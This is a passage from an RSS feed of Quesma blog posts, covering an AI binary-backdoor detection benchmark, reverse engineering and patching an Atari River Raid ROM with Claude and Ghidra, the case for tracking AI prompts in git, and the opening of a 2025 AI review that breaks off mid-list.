&lt;p&gt;Can AI find backdoors in binaries? Sometimes. &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/claude-opus-4.6/" rel="noopener noreferrer"&gt;Claude Opus 4.6&lt;/a&gt; solved 49% of tasks, while &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/gemini-3-pro-preview/" rel="noopener noreferrer"&gt;Gemini 3 Pro&lt;/a&gt; solved 44% and &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/claude-opus-4.5/" rel="noopener noreferrer"&gt;Claude Opus 4.5&lt;/a&gt; solved 37%.&lt;/p&gt;

&lt;p&gt;As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.&lt;/p&gt;

&lt;p&gt;It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Binary analysis is no longer just for experts
&lt;/h3&gt;

&lt;p&gt;While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.&lt;/p&gt;

&lt;p&gt;A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.&lt;/p&gt;

&lt;p&gt;The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.&lt;/p&gt;

&lt;h3&gt;
  
  
  Future
&lt;/h3&gt;

&lt;p&gt;We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).&lt;/p&gt;

&lt;p&gt;Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.&lt;/p&gt;

&lt;p&gt;Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.&lt;/p&gt;

&lt;p&gt;You can check &lt;a href="https://quesma.com/benchmarks/binaryaudit/" rel="noopener noreferrer"&gt;the full results&lt;/a&gt; and see the tasks at &lt;a href="https://github.com/QuesmaOrg/BinaryAudit" rel="noopener noreferrer"&gt;QuesmaOrg/BinaryAudit&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>benchmark</category>
      <category>security</category>
    </item>
    <item>
      <title>Reverse engineering River Raid with Claude, Ghidra, and MCP</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 29 Jan 2026 09:15:09 +0000</pubDate>
      <link>https://dev.to/teamquesma/reverse-engineering-river-raid-with-claude-ghidra-and-mcp-3oio</link>
      <guid>https://dev.to/teamquesma/reverse-engineering-river-raid-with-claude-ghidra-and-mcp-3oio</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://www.linkedin.com/in/nablaone/" rel="noopener noreferrer"&gt;Rafal Strzalinski&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Can an AI agent navigate Ghidra, the NSA’s open-source reverse engineering suite, well enough to hack an Atari game? &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; is powerful but notoriously complex, with a steep learning curve. Instead of spending weeks learning its interface, what if I could simply describe my goal and let an AI handle the complexity?&lt;/p&gt;

&lt;h2&gt;
  
  
  Childhood dream
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/River_Raid" rel="noopener noreferrer"&gt;River Raid&lt;/a&gt;, the Atari 8-bit version. My first computer was an Atari back in the 80s, and this particular game occupied a disproportionate amount of my childhood attention.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/zYLA_uO-XH0?start=5"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;The ROM is exactly 8kB — almost comical by modern standards. And yet this tiny binary contains everything: graphics, sound, enemy AI, and physics simulation — all compressed into hand-optimized 6502 assembly.&lt;/p&gt;

&lt;p&gt;The objective was straightforward: unlimited lives. It’s the quintessential hack, a rite of passage that kids with hex editors performed for entertainment back in the 80s. In 2025, instead of a hex editor, I have an AI.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup
&lt;/h2&gt;

&lt;p&gt;Ghidra doesn’t have a native AI assistant, so I needed a way to bridge the gap between my instructions and the tool’s internal API. This is where the Model Context Protocol (MCP) comes in.&lt;/p&gt;

&lt;p&gt;I found an open-source &lt;a href="https://github.com/LaurieWired/GhidraMCP" rel="noopener noreferrer"&gt;MCP server for Ghidra&lt;/a&gt; — essentially a connector that allows Claude to talk directly to Ghidra. The concept is elegant: Claude connects to the running Ghidra instance, analyzes the binary, renames functions, and identifies code patterns programmatically.&lt;/p&gt;

&lt;p&gt;In practice, the experience was considerably less elegant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;MCP has no standard distribution format (e.g., Docker, npm) — you git clone and hope for the best.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The resulting chain is: Claude → MCP server → Ghidra extension → Ghidra. Four components, four places where things can break.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI meets 6502
&lt;/h2&gt;

&lt;p&gt;Here’s the thing: I don’t use disassemblers daily. Ghidra’s workflow was completely foreign to me. The whole point was to see if AI could bridge that gap — I’d feed it a mysterious binary, and the Ghidra + LLM combination would figure out it’s a cartridge dump, handle the memory mapping, and guide me through.&lt;/p&gt;

&lt;p&gt;Reality was harsher. To test the AI properly, I renamed the binary to &lt;code&gt;a.rom&lt;/code&gt; — no helpful filename hints. When importing, I selected only the CPU architecture (6502) without specifying the platform. Claude’s first instinct was reasonable: it asked for the MD5 hash to search for known ROM signatures. The MCP tools don’t expose hashing, so that avenue closed immediately.&lt;/p&gt;

&lt;p&gt;First problem: Ghidra loaded the ROM at &lt;code&gt;$0000&lt;/code&gt;, not &lt;code&gt;$A000&lt;/code&gt; where Atari cartridges live. All cross-references pointed nowhere.&lt;/p&gt;

&lt;p&gt;Claude identified the issue with admirable clarity: “The ROM should be loaded at &lt;code&gt;$A000&lt;/code&gt;, not &lt;code&gt;$0000&lt;/code&gt;. You’ll need to rebase the memory image.”&lt;/p&gt;

&lt;p&gt;Me: “Can you perform the rebase?”&lt;/p&gt;

&lt;p&gt;Claude: “Unfortunately, no. The MCP tools don’t have write access for that particular operation.”&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F04nk93qp9j7rvn7ca119.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F04nk93qp9j7rvn7ca119.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I rebased manually to &lt;code&gt;$8000&lt;/code&gt; — still wrong. The code referenced &lt;code&gt;$A000-$BFFF&lt;/code&gt;. Rebased again.&lt;/p&gt;

&lt;p&gt;Two rebasing operations in total, neither of which the AI could perform.&lt;/p&gt;

&lt;p&gt;Where Claude genuinely excelled was in identifying the target platform through hardware register analysis:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8dfgjs9q0pt1ioacai1.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8dfgjs9q0pt1ioacai1.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hardware addresses are essentially fingerprints that can’t be faked, and these particular addresses are unmistakably Atari 8-bit.&lt;/p&gt;

&lt;p&gt;I asked Claude to attempt identification of the game based purely on code patterns and structural analysis. It examined the evidence methodically. Based on this evidence, Claude reached its conclusion:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t4oa4py0cvdacmhe8gp.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t4oa4py0cvdacmhe8gp.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It was, of course, not &lt;a href="https://en.wikipedia.org/wiki/Centipede_%28video_game%29" rel="noopener noreferrer"&gt;Centipede&lt;/a&gt;. It was River Raid.&lt;/p&gt;

&lt;p&gt;This serves as a useful reminder that confidence and accuracy are orthogonal properties.&lt;/p&gt;

&lt;h2&gt;
  
  
  The hack
&lt;/h2&gt;

&lt;p&gt;Despite the identity crisis, Claude still understood the code structure. Finding the lives decrement was straightforward. Claude searched for the canonical pattern: load, decrement, store.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzo6syef6spr0lgxcn8hj.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzo6syef6spr0lgxcn8hj.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The fix is elegantly simple: replace &lt;code&gt;DEY&lt;/code&gt; (decrement Y register) with &lt;code&gt;NOP&lt;/code&gt;(no operation). A single byte modification, where &lt;code&gt;$88&lt;/code&gt; becomes &lt;code&gt;$EA&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Since the MCP tool couldn’t write the binary directly, I applied the patch externally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;printf '\xEA' | dd of=riverraid.bin bs=1 seek=$((0x355)) conv=notrunc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I tested the patched ROM in an emulator by deliberately crashing into a bridge. The lives counter remained stubbornly fixed at 3.&lt;/p&gt;

&lt;p&gt;The hack works as intended.&lt;/p&gt;

&lt;h2&gt;
  
  
  What worked, what didn’t
&lt;/h2&gt;

&lt;p&gt;Claude excelled at pattern recognition — hardware registers, code flow, finding the patch location. It struggled with tasks requiring broader context, such as identifying the game or analyzing sprite data.&lt;/p&gt;

&lt;p&gt;Setting up MCP is a troubleshooting ritual. It eventually worked, but the experience was painfully slow. Claude would fire off a batch of tool calls, some taking 30 seconds each. Too slow for an interactive session — I’d rather have quick responses with clarifying questions than watch a progress bar crawl. We need a better balance between autonomous batch processing and interactive guidance.&lt;/p&gt;

&lt;p&gt;AI should be embedded in every complex GUI tool. We’re in the experimental phase now. Some things work, some don’t. Ideally AI should smooth out the experience in ways traditional help systems never could — compacted Stack Overflow knowledge, real context-aware assistance, and the ability to actually perform tasks rather than just describe them.&lt;/p&gt;

</description>
      <category>claude</category>
      <category>ai</category>
      <category>ghidra</category>
      <category>mcp</category>
    </item>
    <item>
      <title>Vibe coding needs git blame</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Mon, 26 Jan 2026 09:17:45 +0000</pubDate>
      <link>https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m</link>
      <guid>https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m</guid>
      <description>&lt;p&gt;If you write a program in English and AI translates it into Python, which one is the actual source code?&lt;/p&gt;

&lt;p&gt;In the age of vibe coding[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;1&lt;/a&gt;], prompts are becoming the human interface. This raises a new dilemma: should we store these prompts alongside the code they generate, or discard them as transient artifacts?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe15mziri2lipl06ij2co.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe15mziri2lipl06ij2co.webp" alt="The community is divided. When [Gergely Orosz polled developers](https://x.com/GergelyOrosz/status/2001632705050742975) about making prompts visible to code reviewers, opinions split: 49% loved it, while 24% hated the idea. Meanwhile, the industry is betting on a fundamental shift: [Cursor acquiring Graphite](https://techcrunch.com/2025/12/19/cursor-continues-acquisition-spree-with-graphite-deal/), a startup that uses AI to review and debug code, and [Meta creating internal tooling to publish prompts](https://newsletter.pragmaticengineer.com/i/182006906/internal-dev-tooling-at-meta-and-trajectories)." width="800" height="505"&gt;&lt;/a&gt;The community is divided. When &lt;a href="https://x.com/GergelyOrosz/status/2001632705050742975" rel="noopener noreferrer"&gt;Gergely Orosz polled developers &lt;/a&gt;about making prompts visible to code reviewers, opinions split: 49% loved it, while 24% hated the idea. Meanwhile, the industry is betting on a fundamental shift: &lt;a href="https://techcrunch.com/2025/12/19/cursor-continues-acquisition-spree-with-graphite-deal/" rel="noopener noreferrer"&gt;Cursor acquiring Graphite&lt;/a&gt;, a startup that uses AI to review and debug code, and &lt;a href="https://newsletter.pragmaticengineer.com/i/182006906/internal-dev-tooling-at-meta-and-trajectories" rel="noopener noreferrer"&gt;Meta creating internal tooling to publish prompts&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We are still figuring out the norms for this new reality.&lt;/p&gt;

&lt;h2&gt;
  
  
  Are prompts the new source code?
&lt;/h2&gt;

&lt;p&gt;Traditionally, source code is what humans write, and machine code is what computers execute.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f591oq5r599wjx6mu6.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f591oq5r599wjx6mu6.webp" alt=" " width="800" height="119"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the end user, the build is all that matters. They download binaries or open the website. They don’t care about the code, nor should they. Yet source code is what is needed for development — and sufficient to generate builds.&lt;/p&gt;

&lt;p&gt;With vibe coding, we translate natural language into programming language:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxukzu48xuyhlqm6vhik.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxukzu48xuyhlqm6vhik.webp" alt=" " width="800" height="119"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If prompts are the real “source”, should we be committing them instead of the Python, TypeScript, or Rust they generate? It might be tempting to cut the middleman and treat our instructions as source code. But it does not work that way.&lt;/p&gt;

&lt;p&gt;Building code is deterministic, or close to it. Code that compiles only during a full moon is not good code. In 2026 we are well past the era of “works on my machine” and should never go back there.&lt;/p&gt;

&lt;p&gt;Good repositories have a clear way of execution, so there is no guesswork on which commands to run, or which package version to use. In most modern languages, toolsets are good — both in package managers and in other tooling — Dockerfiles, GitHub Actions, or similar.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbvy3d04kq0l80d47tbr7.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbvy3d04kq0l80d47tbr7.webp" alt=" " width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At the same time, generating code from prompts is non-deterministic by nature, and hard to replicate.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Probabilistic nature&lt;/strong&gt;: We can try to set &lt;code&gt;temperature=0&lt;/code&gt;, but it is neither supported by all APIs nor guaranteed to produce the best result (see this beautiful &lt;a href="https://poloclub.github.io/transformer-explainer/" rel="noopener noreferrer"&gt;Transformer Explainer&lt;/a&gt;). &lt;a href="https://thinkingmachines.ai/blog/defeating-nondeterminism-in-llm-inference/" rel="noopener noreferrer"&gt;Guaranteeing determinism is a research problem&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Lack of long-term support&lt;/strong&gt;: Models update silently or are deprecated. Unlike pinned package versions, we cannot rely on a specific model snapshot existing forever.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hard to capture context&lt;/strong&gt;: LLMs work best with rich context beyond the prompt itself, including conversation history, memory, skills, screenshots, tool outputs, and MCP servers.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Even in the simplest case, results differ.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeqlas8v3zaidio0trag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeqlas8v3zaidio0trag.png" alt="Same prompt (“Create an HTML file with a cute, interactive octopus.”), same agent (Claude Code), same model (Opus 4.5), still — slightly different results." width="767" height="256"&gt;&lt;/a&gt;Same prompt (“Create an HTML file with a cute, interactive octopus.”), same agent (Claude Code), same model (Opus 4.5), still — slightly different results.&lt;/p&gt;

&lt;p&gt;In larger projects, the same prompt might solve an issue once, fail another time, and introduce a new bug.&lt;/p&gt;

&lt;p&gt;Even something as explicit as “correct grammar” of a single blog post yields different outcomes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhuuenrxmq7o0z2d0jtx.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhuuenrxmq7o0z2d0jtx.webp" alt="I ran four instances of Gemini 3 Pro in parallel in Cursor, with the same prompt — “Correct grammar in this post”. Even for standard tasks, each worked differently and gave different results." width="800" height="284"&gt;&lt;/a&gt;I ran four instances of Gemini 3 Pro in parallel in Cursor, with the same prompt — “Correct grammar in this post”. Even for standard tasks, each worked differently and gave different results.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where is the room for prompts?
&lt;/h2&gt;

&lt;p&gt;Prompts are a kind of spec. They can be very vague, leaving a lot of room for interpretation.&lt;/p&gt;

&lt;p&gt;Natural language does not compile — which is both a feature and a curse.&lt;/p&gt;

&lt;p&gt;Even when they are precise, there is still space left[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;2&lt;/a&gt;]. Just because we gave a clear specification and asked someone (or something) to do it, doesn’t mean it works yet. Current LLMs are far from perfect. Sometimes they fail instructions that would be clear to an employee.&lt;/p&gt;

&lt;p&gt;That’s why prompts are best treated as intentions and notes from the development process — useful context, not a reliable build input.&lt;/p&gt;

&lt;h3&gt;
  
  
  We should be able to (git) blame AI
&lt;/h3&gt;

&lt;p&gt;I think that all contributions from AI should be attributed as such (both code changes and commits). Not because they are worse (or better), but as an essential troubleshooting tool. More and more open source projects require clear disclosure on AI contributions[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;3&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Among other things, it is crucial to know: what was intended, what was a conscious decision, and what just “happened”.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58g2gmz7gibv7iy5tyet.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58g2gmz7gibv7iy5tyet.webp" alt="From [stared/sc2-balance-timeline](https://github.com/stared/sc2-balance-timeline), my entirely vibe-coded side project [15 Years of StarCraft II Balance Changes Visualized](https://p.migdal.pl/sc2-balance-timeline/). Each commit is also Claude-generated, so I can compare package changes with their intention." width="800" height="271"&gt;&lt;/a&gt;From &lt;a href="https://github.com/stared/sc2-balance-timeline" rel="noopener noreferrer"&gt;stared/sc2-balance-timeline&lt;/a&gt;, my entirely vibe-coded side project &lt;a href="https://p.migdal.pl/sc2-balance-timeline/" rel="noopener noreferrer"&gt;15 Years of StarCraft II Balance Changes Visualized&lt;/a&gt;. Each commit is also Claude-generated, so I can compare package changes with their intention.&lt;/p&gt;

&lt;p&gt;Tracking prompts helps us on a few levels:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Learning&lt;/strong&gt;: The AI world is moving so fast it is hard to catch up. Learning from peers is super valuable — even Andrej Karpathy mentioned &lt;a href="https://x.com/karpathy/status/1761461671913160759" rel="noopener noreferrer"&gt;he feels behind&lt;/a&gt;. Seeing how others prompt models helps us improve our own workflows.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Intent verification&lt;/strong&gt;: We can understand the intention behind a change by reading the prompt.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Efficient reviewing&lt;/strong&gt;: AI makes it easy to create a commit, but it may take more time to review. Knowing code is AI-generated signals where to look closer. For example some code such as UI can be AI-generated, while we want human precision in auth logic.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Reservations
&lt;/h2&gt;

&lt;p&gt;One of the issues with saving prompts is the human factor. Tracking prompts is awkward due to creative flow, privacy, anger, and messiness:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dirty notebook&lt;/strong&gt;: People often write prompts as a stream of consciousness, full of typos and idiosyncrasies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privacy&lt;/strong&gt;: Prompts might contain passwords, API keys, or personal data we don’t want to share publicly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Profanity&lt;/strong&gt;: People behave less civilly towards AI than they would towards coworkers. Sometimes out of frustration, other times because it might actually work (see the &lt;a href="https://simonwillison.net/2025/Feb/25/leaked-windsurf-prompt/" rel="noopener noreferrer"&gt;famous leaked Windurf prompt&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sense of pride&lt;/strong&gt;: For many, coding is a craft that demonstrates high-value skills. Using an LLM can make the output feel less “earned”.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Peer pressure&lt;/strong&gt;: There is a huge amount of “AI Slop” and valid skepticism. Many communities or reviewers automatically reject AI-assisted submissions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We need redaction capabilities. Just as we squash dirty commits before pushing to a public repository, we should be able to curate our prompts.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Code reviews are evolving, and controversy is inevitable.&lt;/p&gt;

&lt;p&gt;We already have standards like &lt;code&gt;MCP&lt;/code&gt;and &lt;code&gt;SKILL.md&lt;/code&gt; — and we need one to share prompts alongside git commits. We are building an open-source tool to help with this — stay tuned!&lt;/p&gt;

&lt;p&gt;In the meantime, start simple: if you use AI to write code, use AI to write the commit message.&lt;/p&gt;

&lt;p&gt;It is frustrating to see dozens of AI-generated files committed with a lazy &lt;a href="https://web.archive.org/web/20210606005031/https://www.codemopolitan.com/8-commit-messages/" rel="noopener noreferrer"&gt;fixed it&lt;/a&gt;. If a tool allows vibe coding, it should also allow vibe committing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Footnotes
&lt;/h2&gt;

&lt;p&gt;[1]: See our recent post &lt;a href="https://quesma.com/blog/year-of-ai-2025/" rel="noopener noreferrer"&gt;How 2025 took AI from party tricks to production tools&lt;/a&gt;. Even the term “vibe coding” was coined in February, see Andrej Karpathy’s &lt;a href="https://karpathy.bearblog.dev/year-in-review-2025/" rel="noopener noreferrer"&gt;musings&lt;/a&gt;. Right now, &lt;a href="https://www.reddit.com/r/Anthropic/comments/1pzi9hm/claude_code_creator_confirms_that_100_of_his/" rel="noopener noreferrer"&gt;Claude Code is written in Claude Code&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;[2]: Law is codified, yet requires courts for interpretation. Even mathematics, despite its precision, leaves room for underspecification — hence the need for proof checkers, see &lt;a href="https://martin.kleppmann.com/2025/12/08/ai-formal-verification.html" rel="noopener noreferrer"&gt;AI will make formal verification go mainstream&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;[3]: &lt;a href="https://github.com/ghostty-org/ghostty/pull/8289" rel="noopener noreferrer"&gt;Ghostty requires clear AI disclosure&lt;/a&gt;, &lt;a href="https://www.mail-archive.com/gentoo-dev@lists.gentoo.org/msg99042.html" rel="noopener noreferrer"&gt;Gentoo plans to ban AI contribution&lt;/a&gt;, and there is a lot of general discussion on &lt;a href="https://samsaffron.com/archive/2025/10/27/your-vibe-coded-slop-pr-is-not-welcome" rel="noopener noreferrer"&gt;a good standard for peer-reviewing AI-assisted pull requests&lt;/a&gt;. &lt;a href="https://maxemitchell.com/writings/i-read-all-of-cloudflares-claude-generated-commits/" rel="noopener noreferrer"&gt;People actually read Claude-generated Claudflare’s code&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claude</category>
      <category>vibecoding</category>
    </item>
    <item>
      <title>How 2025 took AI from party tricks to production tools</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Mon, 05 Jan 2026 13:16:29 +0000</pubDate>
      <link>https://dev.to/teamquesma/how-2025-took-ai-from-party-tricks-to-production-tools-4l7b</link>
      <guid>https://dev.to/teamquesma/how-2025-took-ai-from-party-tricks-to-production-tools-4l7b</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;What began 2025 as bold experiments became the industry standard by year’s end. Two paradigms drove this shift: reasoning models (spending tokens to think before answering) and agentic tool use (executing code to interact with the world).&lt;/p&gt;

&lt;p&gt;This subjective review of LLMs for software engineering covers three stages: the experimental breakthroughs of the first half of 2025, the production struggles where agents were often too chaotic to be useful, and the current state of practical, everyday tools.&lt;/p&gt;

&lt;h2&gt;
  
  
  First half of 2025
&lt;/h2&gt;

&lt;h3&gt;
  
  
  January
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;DeepSeek released the first open-source reasoning model, &lt;a href="https://github.com/deepseek-ai/DeepSeek-R1" rel="noopener noreferrer"&gt;DeepSeek-R1&lt;/a&gt;, sharing both weights and know-how. It broke the paradigm that AI is, and will remain, an oligopoly of proprietary models. Previously we only had &lt;a href="https://openai.com/o1/" rel="noopener noreferrer"&gt;o1&lt;/a&gt;, released in Sept 2024 by OpenAI.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  February
&lt;/h3&gt;

&lt;ul&gt;
